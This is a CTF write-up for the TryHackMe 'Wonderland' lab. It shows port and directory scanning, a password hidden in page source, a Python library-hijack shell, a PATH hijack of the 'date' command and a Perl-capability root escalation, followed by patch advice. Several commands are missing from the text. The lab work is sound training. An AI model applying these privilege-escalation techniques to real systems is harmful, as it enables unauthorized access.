Skip to main content
  1. writeup-ctf/

Writeup - Wonderland (THM)

·721 words·4 mins·
Cybersecurity, Devops, Infrastructure
Table of Contents

This is a writeup for the Wonderland machine from the TryHackMe site.


First, let’s start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 7.6p1)
  • 80/tcp : HTTP web server


At first I start by scanning the pages of the site:

When I go to the r page, I see the following message:

So I do a recursive scan to see the complete tree:

ffuf -c -u -w wordlist/common.txt -recursion -recursion-depth 6

I finally find the following page:

I look at the source code of the page and find a p tag with a style that does not display it. The content of this tag looks very much like credentials…

<!DOCTYPE html>

    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="/main.css">

    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
    <img src="/img/alice_door.png" style="height: 50rem;">

So I try to connect via SSH :

I now have a shell and can retrieve the first flag.

alice@wonderland:~$ cat /root/user.txt
thm{"Curiouser and curiouser!"}

Privilege escalation

Looking at the contents of the home folder, I find several users:

alice@wonderland:/home$ ls
alice  hatter  rabbit  tryhackme

I am now looking at my sudo permissions:

So I can run this python script with the rabbit user’s permissions. So I look at the content of this script:

import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
And that was scarcely odd, because
They’d eaten every one."""

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

I run it to make sure I’ve got it right.

So it’s a script that allows to output 10 random sentences from the text included in the script. Interestingly, the script uses random. So I create a file in the same folder in which I insert a reverse shell. When the script is executed, it should use our file! So I create this new file with the following content :

import pty

I now run the script with the following command:

In the folder of this new user, we find the file teaParty. Using the strings command, I can find the following readable text:

Welcome to the tea party!
The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for him

The program uses the date command, but interestingly, the program doesn’t use an absolute path. So I’ll be able to create a script with the same name, and then add the folder that contains this new script to the $PATH variable.

I start by creating the script with the following content:


Then I add the execution permissions and I add my personal folder at the beginning of the PATH variable.

chmod +x date
export PATH=/home/rabbit:$PATH

I can now run the program :

In the personal folder of this new user I find the following file:

hatter@wonderland:/home/hatter$ ls
hatter@wonderland:/home/hatter$ cat password.txt 

So I try to connect via SSH with this password:

After some research to do a privilege elevation I find nothing. So I try to run By analyzing the output of the command I find the following lines:

By going on the GTFObins de Perl I find a way to make a privilege elevation.

Using the following command, I get a root shell and I can get the last flag.


To patch this host I think it would be necessary to perform a number of actions:

  • Do not leave passwords in HTML code
  • Use absolute paths in programs
  • Do not leave clear passwords in files
  • Modify Perl permissions to avoid elevation of privilege.


Writeup - Nibbles (HTB)
·386 words·2 mins
Writeup - Tech_Supp0rt: 1 (THM)
·624 words·3 mins
Writeup - Shocker (HTB)
·233 words·2 mins